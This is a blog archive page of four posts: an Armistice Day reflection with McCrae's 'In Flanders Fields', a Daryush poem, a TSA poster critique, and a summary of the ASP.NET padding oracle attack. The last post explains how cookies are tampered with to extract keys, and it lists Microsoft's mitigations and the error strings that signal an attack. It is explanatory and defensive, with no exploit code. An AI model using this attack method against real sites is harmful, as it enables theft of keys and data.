Category Archives: Poetry

History, Poetry, Security

Eleventh hour of the eleventh day of the eleventh month

Leave a comment

Today marks Armistice Day, the 1918 surrender of Germany that ended hostility on the Western Front in World War I.

It also is known as Veteran’s Day in the US, thanks to sentiment from Kansas, as I have written before.

Poppies are used for remembrance in reference to one of the most heavily contested areas of Europe, Flanders, which sits between French, German and British control. The flowers grew all around the battlefields and expanding cemeteries of Belgium.

A poem called “In Flanders Fields” was written by Canadian Colonel John McCrae while fighting there and published in 1915:

In Flanders fields the poppies blow
      Between the crosses, row on row,
   That mark our place; and in the sky
   The larks, still bravely singing, fly
Scarce heard amid the guns below.

We are the Dead. Short days ago
We lived, felt dawn, saw sunset glow,
   Loved and were loved, and now we lie,
         In Flanders fields.

Take up our quarrel with the foe:
To you from failing hands we throw
   The torch; be yours to hold it high.
   If ye break faith with us who die
We shall not sleep, though poppies grow
         In Flanders fields.


Poster from the Canadian War Department

The reference to crosses is not universal for more reasons than one might expect. Today the German news points out that some of the dead are treated differently from the other casualties in Flanders.

The Langemark cemetery is the final resting place of 44,294 German soldiers. More than half of them are buried in one mass grave, the Kameraden Grab, their names etched on large dark plaques running alongside the site.

[Andre de Bruin, a World War I guide and founder of Over The Top Tours] points to rows of gravestones that lie flat on ground, explaining: “Belgium imposed very strict restrictions on German memorials. Headstones were not allowed to stand, not like those of the Commonwealth soldiers and there were many other rules that applied only to Germans.”

There were hundreds of burial sites of German soldiers after 1918 but in the 1950s, Belgium ordered that the bodies be regrouped in no more than four sites, of which Langemark is one.

“It was probably done out of hatred for what happened, especially during World War II when Belgium was occupied. They even forbade the use of crosses above the headstones,” de Bruin said.

Poetry, Security

Children of Wealth in Your Warm Nursery

Leave a comment

by Elizabeth Daryush, as mentioned in Poetry Magazines

Children of wealth in your warm nursery,
Set in the cushioned window-seat to watch
The volleying snow, guarded invisibly
By the clear double pane through which no touch
Untimely penetrates, you cannot tell
What winter means; its cruel truths to you
Are only sound and sight; your citadel
Is safe from feeling, and from knowledge too.

Go down, go out to elemental wrong,
Waste your too round limbs, tan your skin too white;
The glass of comfort, ignorance, seems strong
To-day, and yet perhaps this very night
You’ll wake to horror’s wrecking fire­your home
Is wired within for this, in every room.

Poetry, Security

ASP.NET Padding Oracle Attack

Leave a comment

Cryptographic keys can be stolen from ASP.NET web applications by modifying cookies and reviewing the resulting errors — an information disclosure vulnerability from a side channel attack. This video shows the Padding Oracle Exploit Tool (POET) in action:

Details can be found here: Padding Oracle Crypto Attack (POCA)

The attack allows someone to decrypt sniffed cookies, which could contain valuable data such as bank balances, Social Security numbers or crypto keys. The attacker may also be able to create authentication tickets for a vulnerable Web app and abuse other processes that use the application’s crypto API.

[…]

If the padding is invalid, the error message that the sender gets will give him some information about the way that the site’s decryption process works. Rizzo and Duong said that the attack is reliable 100 percent of the time on ASP.NET applications, although the time to success can vary widely. The real limiting resources in this attack are the speed of the server and the bandwidth available.

They say the longest attack time so far has been just 50 minutes. They do not say what the longest time is to fix a site and prevent the attack path.

Microsoft is investigating and discussing a fix. Since it is an information disclosure vulnerability I expect they will enhance the ability to redirect or completely suppress errors. They also may add some randomness of errors to reduce timing attacks — attempts to guess information by the time it takes to respond. Either way, it was already a best practice to suppress errors to prevent information disclosure.

Edited to add (Sep 28th):

  1. Here is a great introduction to Padding Oracle Attack, including Python code
  2. Microsoft has released a patch, which has to be manually installed from their download center. They also give the following recommendations, as I predicted above:

Until the patch has been installed, administrators should configure servers to only respond with a single error page, meaning that all server errors should return the same error page so that an attacker would not be able to determine which part of their request was deciphered properly. In addition to this, modify the Page_Load() function within the custom error page to pause for a short random sleep delay before sending the error response.

Administrators should watch for errors with the following message: “CryptographicException” and/or “Padding is invalid and cannot be removed” as these could be an indicator that an attacker may be trying to exploit this vulnerability against an IIS server.

Poetry, Security

TSA focus on photographers

Leave a comment

The TSA has built a bit of a legacy annoying photographers. I have been hassled personally and I sometimes hear of others getting the same treatment.

Their official spokesman online, Blogger Bob, has responded to recent outrage about the following poster intended for an anti-terror awareness campaign.

The most important part of the blog post, aside from explaining the actual intention of the poster, is to say that photographers can be an asset to security.

In fact, many photographers would be prime candidates to use such vigilance programs to report suspicious activity since they’re extremely observant of their surroundings.

Bingo! The poster did a poor job characterizing the threat as someone doing something entirely legal and NOT suspicious — taking a photograph — when it instead could have called upon photographers to be an asset to the TSA. Wired’s response to this is “Nice save, Bob”

I have tried to make fun of this kind of anti-terror campaign before. The latest TSA attempt is almost funnier than my bogus ones! I clearly will have to try harder.

Old attempt:

New attempt:

Even if it isn’t funny, at least I managed to get a haiku in my poster.

Joe Pries Aviation points out that in Europe photographers are given a “great spot from where to safely photograph (free of charge).”

Does anyone see anything but pure terror here? Scary photo.